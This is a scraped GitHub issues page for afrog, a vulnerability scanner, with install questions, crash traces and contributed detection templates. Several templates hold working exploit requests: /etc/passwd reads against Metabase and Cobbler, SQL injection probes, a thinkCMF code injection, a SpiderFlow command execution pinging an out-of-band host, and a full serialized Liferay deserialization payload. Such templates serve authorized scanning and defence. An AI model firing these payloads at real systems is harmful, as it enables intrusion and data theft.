zan8in / afrog Goto Github PK
View Code? Open in Web Editor NEWA Security Tool for Bug Bounty, Pentest and Red Teaming.
License: MIT License
A Security Tool for Bug Bounty, Pentest and Red Teaming.
License: MIT License
进来看readme我都没弄明白怎么用的,afrog直接也不能用啊,是需要编译还是怎么
是否修改掉 用自用的 dnslog-go平台
[ERR] ceye
reverse service not set: /root/.config/afrog/afrog-config.yaml
| A F R O G > 2.3.1 - 0.1.99
[FTL] Could not create runner: target not found
打扰了,刚看了代码,有漏洞的时候才输出json。
这个可以保留
Hello
can someone show me the steps to install this tool on a MacBook?
Thanks
单url速度很快,一批url速度就慢了,期待加入多线程
Failed to start afrog,please edit api-key
and domain
in /root/.config/afrog/afrog-config.yaml
id: CVE-2021-41277
info:
name: Metabase 输入验证错误漏洞
author: rain
severity: high
description: |
在受影响的版本中,自定义 GeoJSON 地图(admin->settings->maps->custom maps->add a map)操作缺少权限验证,攻击者可通过该漏洞获得敏感信息。
影响版本:
metabase version < 0.40.5
metabase version >= 1.0.0, < 1.40.5
修复版本:
metabase version >= 0.40.5
metabase version >= 1.40.5
reference:
- GHSA-w73v-6p7p-fpfr
rules:
r0:
request:
method: GET
path: /api/geojson?url=file:///etc/passwd
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept-Encoding: gzip, deflate
expression: response.status == 200 && "root:[x*]?:0:0:".bmatches(response.body)
r1:
request:
method: GET
path: /api/geojson?url=file:///etc/resolv.conf
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept-Encoding: gzip, deflate
expression: response.status == 200 && "namespace".bmatches(response.body)
expression: r0() || r1()
How to install in Kali Linux
启动 afrog 出错,rerverse CeyeApiKey or CeyeDomain is Empty in your /home/[yourname]/.config/afrog/afrog-config.yaml
thx
[root@1 1]# ./afrog_linux --updatepocs
PoC Update failed, failed to get remote version number
NAME:
afrog 漫天星辰 - v1.3.6
PATH:
/root/.config/afrog/afrog-config.yaml
v
just an inquiry on how to install considering no documentation is provided
id: CNVD-2018-16876
info:
name: Cobbler任意文件读取漏洞
author: rain
severity: medium
description: |
Cobbler是一款网络安装服务器套件,它能够快速建立Linux网络安装环境。
Cobbler 2.6.11-1版本中存在任意文件读取漏洞。攻击者可利用该漏洞读取任意文件。
reference:
- https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2016-9605
rules:
r0:
request:
method: POST
path: /cobbler_api
headers:
Content-Type: text/xml
Accept-Encoding: gzip
body: |
<?xml version='1.0'?><methodCall><methodName>generate_script</methodName><params><param><value><string>windows10</string></value></param><param><value><string></string></value></param><param><value><string>/etc/passwd</string></value></param></params></methodCall>
expression: response.status == 200 && "root:[x*]?:0:0:".bmatches(response.body)
expression: r0()
id: yunshikong-ERP-SQL-injection
info:
name: yunshikong-ERP-SQL-injection
author: laohuan12138
severity: high
description: |
云时空 社会化商业ERP系统存在SQL注入漏洞,攻击者通过漏洞可以获取数据库敏感信息
FOFA: title="云时空社会化商业ERP"
reference:
- https://wiki.peiqi.tech/wiki/webapp/云时空ERP/云时空%20社会化商业ERP系统%20validateLoginName%20SQL注入漏洞.html
rules:
r0:
request:
method: GET
path: /sys/user/validateLoginName?loginName=admin'
expression: response.status == 500 && response.body.bcontains(b"SQLException")
expression: r0()
我在编写如下poc 验证时发现一个问题,返回包的编码问题可能会影响类似这种匹配规则 response.body.bcontains(b'\x7e\x70\x05\x53\x6e')
编写的poc内容如下:
id: e-cology-weaver-v9-dbconfigreader-info-leak
info:
name: 泛微OA e-cology V9前台数据库帐号密码信息泄漏漏洞
author: secse(https://github.com/forktopot)
severity: high
description: 泛微OA ecology v9数据库帐号密码信息泄漏漏洞 app="Weaver-OA"
reference:
- https://github.com/jas502n/DBconfigReader
rules:
r0:
request:
method: GETF
path: /mobile/DBconfigReader.jsp
follow_redirects: false
expression: response.status == 200 && (response.body.bcontains(b'\x7e\x70\x05\x53\x6e') || response.body.bcontains(b'\x7e\x70\x05\x40\x73'))
expression: r0()
该poc我在xray 上使用是完全没有问题然后改过来的
一开始无法验证,然后我把 pkg/protocols/http/retryhttpclient/client.go p179 行修改后便可以验证了
如果response包过大 则不会保存完整响应包数据, html和json都一样
测试靶场:vulhub/liferay-portal/CVE-2020-7961
验证:
id: CVE-2020-7961
info:
name: Liferay Portal RCE 反序列化命令执行漏洞
author: leo
severity: high
verified: true
description: |
Liferay Portal CE是一款用来快速构建网站的开源系统。其7.2.0 GA1及以前的版本API接口中存在一处反序列化漏洞,利用该漏洞可在目标服务器上执行任意命令。
FOFA:app="Liferay"
reference:
- https://www.anquanke.com/post/id/240042
set:
randstr: randomLowercase(15)
rules:
r0:
request:
method: POST
path: /api/jsonws/invoke
headers:
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
command: echo {{randstr}}
body: |
cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=pZryCOb2&formDate=1679026956587&tableId=1&name=1&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200176A6176612E7574696C2E5072696F72697479517565756594DA30B4FB3F82B103000249000473697A654C000A636F6D70617261746F727400164C6A6176612F7574696C2F436F6D70617261746F723B7870000000027372002B6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E436F6D70617261746F72E3A188EA7322A4480200024C000A636F6D70617261746F7271007E00014C000870726F70657274797400124C6A6176612F6C616E672F537472696E673B78707372003F6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E636F6D70617261746F72732E436F6D70617261626C65436F6D70617261746F72FBF49925B86EB13702000078707400106F757470757450726F706572746965737704000000037372003A636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000649000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465785B000A5F62797465636F6465737400035B5B425B00065F636C6173737400125B4C6A6176612F6C616E672F436C6173733B4C00055F6E616D6571007E00044C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B787000000000FFFFFFFF757200035B5B424BFD19156767DB37020000787000000002757200025B42ACF317F8060854E0020000787000000BCECAFEBABE0000003200900A0003002207008E07002507002601001073657269616C56657273696F6E5549440100014A01000D436F6E7374616E7456616C756505AD2093F391DDEF3E0100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010013537475625472616E736C65745061796C6F616401000C496E6E6572436C61737365730100354C79736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F61643B0100097472616E73666F726D010072284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B5B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B2956010008646F63756D656E7401002D4C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B01000868616E646C6572730100425B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A457863657074696F6E730700270100A6284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B29560100086974657261746F720100354C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B01000768616E646C65720100414C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A536F7572636546696C6501000C476164676574732E6A6176610C000A000B07002801003379736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F6164010040636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F41627374726163745472616E736C65740100146A6176612F696F2F53657269616C697A61626C65010039636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F5472616E736C6574457863657074696F6E01001F79736F73657269616C2F7061796C6F6164732F7574696C2F476164676574730100083C636C696E69743E010043636F6D2F6C6966657261792F706F7274616C2F6B65726E656C2F73656375726974792F6163636573732F636F6E74726F6C2F416363657373436F6E74726F6C5574696C07002A010017676574416363657373436F6E74726F6C436F6E7465787401004028294C636F6D2F6C6966657261792F706F7274616C2F6B65726E656C2F73656375726974792F617574682F416363657373436F6E74726F6C436F6E746578743B0C002C002D0A002B002E01003C636F6D2F6C6966657261792F706F7274616C2F6B65726E656C2F73656375726974792F617574682F416363657373436F6E74726F6C436F6E7465787407003001000B676574526573706F6E736501002A28294C6A617661782F736572766C65742F687474702F48747470536572766C6574526573706F6E73653B0C003200330A0031003401000A6765745265717565737401002928294C6A617661782F736572766C65742F687474702F48747470536572766C6574526571756573743B0C003600370A00310038010007636F6D6D616E6408003A0100256A617661782F736572766C65742F687474702F48747470536572766C65745265717565737407003C010009676574486561646572010026284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E673B0C003E003F0B003D00400100076F732E6E616D650800420100106A6176612F6C616E672F53797374656D07004401000B67657450726F70657274790C0046003F0A004500470100106A6176612F6C616E672F537472696E6707004901000B746F4C6F7765724361736501001428294C6A6176612F6C616E672F537472696E673B0C004B004C0A004A004D01000377696E08004F010008636F6E7461696E7301001B284C6A6176612F6C616E672F4368617253657175656E63653B295A0C005100520A004A0053010007636D642E6578650800550100022F63080057010004626173680800590100022D6308005B0100116A6176612F6C616E672F52756E74696D6507005D01000A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B0C005F00600A005E006101000465786563010028285B4C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0C006300640A005E00650100116A6176612F6C616E672F50726F6365737307006701000E676574496E70757453747265616D01001728294C6A6176612F696F2F496E70757453747265616D3B0C0069006A0A0068006B0100116A6176612F7574696C2F5363616E6E657207006D010018284C6A6176612F696F2F496E70757453747265616D3B29560C000A006F0A006E00700100025C6108007201000C75736544656C696D69746572010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F7574696C2F5363616E6E65723B0C007400750A006E00760100076861734E65787401000328295A0C007800790A006E007A0100046E6578740C007C004C0A006E007D01000008007F0100106C6966657261795263654465746563740800810100266A617661782F736572766C65742F687474702F48747470536572766C6574526573706F6E7365070083010009736574486561646572010027284C6A6176612F6C616E672F537472696E673B4C6A6176612F6C616E672F537472696E673B29560C008500860B008400870100135B4C6A6176612F6C616E672F537472696E673B0700890100136A6176612F696F2F496E70757453747265616D07008B01000D537461636B4D61705461626C6501001E79736F73657269616C2F50776E65723130323233313931343032353530300100204C79736F73657269616C2F50776E65723130323233313931343032353530303B002100020003000100040001001A000500060001000700000002000800040001000A000B0001000C0000002F00010001000000052AB70001B100000002000D0000000600010000002F000E0000000C000100000005000F008F00000001001300140002000C0000003F0000000300000001B100000002000D00000006000100000034000E00000020000300000001000F008F000000000001001500160001000000010017001800020019000000040001001A00010013001B0002000C000000490000000400000001B100000002000D00000006000100000038000E0000002A000400000001000F008F00000000000100150016000100000001001C001D000200000001001E001F00030019000000040001001A00080029000B0001000C000000D50005000A0000009AA70003014CB8002FB600354DB8002FB600394E2D123BB9004102003A041243B80048B6004E1250B600543605150599001B06BD004A5903125653590412585359051904533A06A7001806BD004A5903125A535904125C5359051904533A06B800621906B60066B6006C3A07BB006E591907B700711273B600773A081908B6007B99000B1908B6007EA7000512803A092C12821909B900880300B100000001008D00000029000503FF00450006000507008407003D07004A010000FC001407008AFD002C07008C07006E4107004A0002002000000002002100110000000A000100020023001000097571007E0010000001D4CAFEBABE00000032001B0A0003001507001707001807001901001073657269616C56657273696F6E5549440100014A01000D436F6E7374616E7456616C75650571E669EE3C6D47180100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010003466F6F01000C496E6E6572436C61737365730100254C79736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324466F6F3B01000A536F7572636546696C6501000C476164676574732E6A6176610C000A000B07001A01002379736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324466F6F0100106A6176612F6C616E672F4F626A6563740100146A6176612F696F2F53657269616C697A61626C6501001F79736F73657269616C2F7061796C6F6164732F7574696C2F47616467657473002100020003000100040001001A000500060001000700000002000800010001000A000B0001000C0000002F00010001000000052AB70001B100000002000D0000000600010000003C000E0000000C000100000005000F001200000002001300000002001400110000000A000100020016001000097074000450776E72707701007871007E000D78%3B%22%7D
expression: response.raw_header.bcontains(bytes(randstr))
expression: r0()
获取rsa key咋利用?
在源码中添加自定义请求头,编译运行后使用zeek捕捉http请求,发现afrog.exe运行后可以抓到自定义头,在linux下执行没有找到
CVE-2021-31805 POC根本跑不出来噢~
id: SpiderFlow-save-rce
info:
name: SpiderFlow save 远程命令执行漏洞
author: laohuan12138
severity: high
description: |
spiderflow 是一个爬虫平台,以图形化方式定义爬虫流程,无需代码即可实现一个爬虫,其中/function/save接口存在命令执行漏洞,可获取系统权限。
fofa: title=="SpiderFlow"
reference:
- https://cn-sec.com/archives/1366553.html
set:
reverse: newReverse()
reverseHost: reverse.url.host
rules:
r0:
request:
method: POST
path: /function/save
body: |
id=&name=cmd¶meter=yw&script=}Java.type('java.lang.Runtime').getRuntime().exec('ping {{reverseHost}}');{
expression: reverse.wait(5)
expression: r0()
Downloading the latest version of afrog-pocs...
panic: flate: corrupt input before offset 5
goroutine 1 [running]:
github.com/zan8in/afrog/pkg/utils.Unzip.extractAndWriteFile.func1()
github.com/zan8in/afrog/pkg/utils/unzip.go:58 +0x3c
github.com/zan8in/afrog/pkg/utils.Unzip.extractAndWriteFile({}, {0xc000526108, 0x12}, 0xc000542420)
github.com/zan8in/afrog/pkg/utils/unzip.go:90 +0x3a2
github.com/zan8in/afrog/pkg/utils.Unzip.Extract({}, {0xc00003b1a0?, 0xc000117901?}, {0xc000526108, 0x12})
github.com/zan8in/afrog/pkg/utils/unzip.go:40 +0x225
github.com/zan8in/afrog/pkg/upgrade.(*Upgrade).Unzip(0xc00016a1e0, {0xc00003b1a0?, 0x101a768?})
github.com/zan8in/afrog/pkg/upgrade/upgrade.go:133 +0x3d
github.com/zan8in/afrog/pkg/upgrade.(*Upgrade).Download(0xc00016a1e0)
github.com/zan8in/afrog/pkg/upgrade/upgrade.go:121 +0x9f
github.com/zan8in/afrog/pkg/upgrade.(*Upgrade).UpgradePocs(0xc00016a1e0)
github.com/zan8in/afrog/pkg/upgrade/upgrade.go:103 +0x10f
github.com/zan8in/afrog/pkg/config.(*Options).verifyOptions(0xc0006041a0)
github.com/zan8in/afrog/pkg/config/options.go:229 +0x6f0
github.com/zan8in/afrog/pkg/config.NewOptions()
github.com/zan8in/afrog/pkg/config/options.go:174 +0x1405
main.main()
./main.go:26 +0x2e
会这样子报错
pkg/runner/cel.go:15:2: google.golang.org/[email protected]: Get "https://proxy.golang.org/google.golang.org/genproto/@v/v0.0.0-20210831024726-fe130286e0e2.zip": dial tcp 172.217.163.49:443: i/o timeout
pkg/proto/http.pb.go:10:2: google.golang.org/[email protected]: Get "https://proxy.golang.org/google.golang.org/protobuf/@v/v1.28.1.zip": dial tcp 172.217.163.49:443: i/o timeout
pkg/proto/http.pb.go:11:2: google.golang.org/[email protected]: Get "https://proxy.golang.org/google.golang.org/protobuf/@v/v1.28.1.zip": dial tcp 172.217.163.49:443: i/o timeout
pkg/poc/poc.go:9:2: gopkg.in/[email protected]: Get "https://proxy.golang.org/gopkg.in/yaml.v2/@v/v2.4.0.zip": dial tcp 172.217.163.49:443: i/o timeout
就主要报这个错,师傅我该怎么解决呀,用代理也不行
id: thinkcmf-file-include
info:
name: thinkCMF 文件包含
author: rain
severity: Critical
description: |
在受影响的版本中,可通过漏洞实现任意文件写入或任意代码执行
影响版本:
thinkCMFX 1.6.0-2.2.3
修复版本:
metabase version >= 0.40.5
metabase version >= 1.40.5
reference:
- https://www.thinkcmf.com/
rules:
r0:
request:
method: GET
path: /?a=fetch&templateFile=public/index&prefix="&content=die(@md5(thinkcmf))
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
expression: response.status == 200 && "3bedf9f6e16de1cb5403356aaa7bec38".bmatches(response.body)
expression: r0()
Hi,
i setup it using git clone then iam trying to run it but i do not know why or what should i do next.
Any help about the next steps to run it ?
CVE-2023-0297.yaml
https://huntr.dev/bounties/3fd606f7-83e1-4265-b083-2e1889a05e65/
Also, due to the lack of CSRF protection, a victim can be tricked to execute arbitrary python code
CSRF触发的RCE
目前json输出三个字段{"name":"xxx","severity":"xx","url":"http://xxx"} ,可以使用的场景比较少,可以考虑添加,请求包,响应包、poc文件里面的info字段的所有内容和id等等,就通过指定参数的形式添加输出内容,就好像nuclei的一样,个人比较喜欢用afrog
url和接口进行爬取后 在进行漏洞扫描
师傅,本地搭的3.0环境没有成功复现呢
使用ssr-command-client挂上shadowsocksr代理,无法成功走代理。地址:https://github.com/TyrantLucifer/ssr-command-client/
配置方式:
hattp://127.0.0.1:1080
socks://127.0.0.1:1080
socks5://127.0.0.1:1080
三种方式都不太行
https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/g-CVE/2021/CVE-2021-22145.yaml
参考https://github.com/jaeles-project/jaeles-signatures/blob/master/cves/elasctic-memory-leak-cve-2021-22145.yaml
StatusCode() >= 400 && StringSearch("response", '"root_cause"') && StringSearch("resHeaders", "application/json") && StringSearch("response", 'truncated')
响应报文包含truncated时,才判断有漏洞。
afrog认为响应报文包含reason时存在漏洞。
实际扫描发现,afrog对reason的判断,似乎是不准确的,存在误报。
每次启动扫描都要将所有POC下载一遍,但是文件夹又是空的,还扫描不出来任何结果。每次扫描必须指定端口才可以扫描到结果吗?
Can you add to the readme how to install on linux?
id: e-office-v10-sql-inject
info:
name: 泛微 eoffice v10 前台 SQL 注入
author: 你是猪
severity: high
description: |
FOFA:fid="2csJpuWtfTdSAavIfJTuBw=="
进一步利用/验证方法,参考下面 reference 链接
reference:
- https://www.hedysx.com/2777.html
rules:
r0:
request:
method: GET
path: /eoffice10/server/ext/system_support/leave_record.php?flow_id=1&run_id=1&table_field=1&table_field_name=user()&max_rows=10
expression: response.status == 200 && response.body.bcontains(b'<p>未找到相关数据</p>')
expression: r0()
─$ /home/kali/Desktop/afrog_linux_amd64 -T /home/kali/Desktop/vulmap-0.9/list.txt -o afrog_result1.html 2 ⨯
一个挖洞工具 A tool for finding vulnerabilities - V1.2.7
Default Conf /home/kali/.config/afrog/afrog-config.yaml
Default Pocs /home/kali/afrog-pocs v0.1.0
Output Report afrog_result1.html
2/926 | 0% panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x0 pc=0xa57b41]
goroutine 55 [running]:
github.com/zan8in/afrog/pkg/core.(*Engine).ReleaseChecker(0xc0003480f0, 0xc0003418c0)
C:/Users/zanbi/go/src/github.com/zan8in/afrog/pkg/core/engine.go:32 +0x21
github.com/zan8in/afrog/pkg/core.(*Engine).executeExpression(, {, }, {{0xc000356ec0, 0x1c}, {0x0, 0x0}, {0x0, 0x0, 0x0}, ...})
C:/Users/zanbi/go/src/github.com/zan8in/afrog/pkg/core/excute.go:74 +0x1b2
github.com/zan8in/afrog/pkg/core.(*Engine).executeTargets.func2({, _}, {{0xc000356ec0, 0x1c}, {0x0, 0x0}, {0x0, 0x0, 0x0}, {0x0, ...}, ...})
C:/Users/zanbi/go/src/github.com/zan8in/afrog/pkg/core/excute.go:62 +0xc5
created by github.com/zan8in/afrog/pkg/core.(*Engine).executeTargets
C:/Users/zanbi/go/src/github.com/zan8in/afrog/pkg/core/excute.go:59 +0x392
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.